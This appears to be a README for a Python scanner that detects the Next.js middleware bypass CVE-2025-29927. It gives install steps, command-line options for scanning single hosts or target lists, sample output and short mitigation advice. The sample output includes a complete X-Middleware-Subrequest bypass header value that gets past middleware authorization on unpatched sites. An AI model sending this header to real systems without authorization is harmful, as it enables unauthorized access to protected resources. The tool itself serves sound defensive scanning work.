
Next.js Middleware Bypass Scanne
CVE-2025-29927 is a specialized security tool for detecting the Next.js middleware bypass vulnerability (CVE-2025-29927) affecting Next.js versions 11.1.4 through 15.2.2. This critical vulnerability allows attackers to bypass security controls by sending a specially crafted HTTP header.
The Next.js middleware bypass vulnerability (CVE-2025-29927) allows attackers to circumvent authorization controls by sending a malicious X-Middleware-Subrequest header that confuses the middleware processing logic. This can lead to unauthorized access to protected resources and routes.
CVSS Score: 9.1 (Critical)
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927
# Install requirements
pip install -r requirements.txt
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
-t, --target: Single target to scan (e.g., example.com or https://example.com)-f, --file: File containing list of targets (one per line)-c, --concurrency: Number of concurrent scans (default: 5)-k, --insecure: Disable SSL certificate verification (useful for IP addresses)-s, --silent: Silent mode - only show vulnerable targetsScan a single target:
python CVE-2025-29927.py -t example.com
Scan multiple targets from a file:
python CVE-2025-29927.py -f targets.txt
Scan with SSL verification disabled:
python CVE-2025-29927.py -t 192.168.1.1 -k
Automated scanning with silent mode:
python CVE-2025-29927.py -f targets.txt -k -s
Scan with a custom Header:
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
For vulnerable targets, MiddleWay displays:
Example output:
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
To mitigate this vulnerability:
X-Middleware-Subrequest header at your WAF or server levelThis tool is provided for security research and defensive purposes only. Always obtain proper authorization before scanning any systems you don't own. The authors are not responsible for any misuse of this tool.
MIT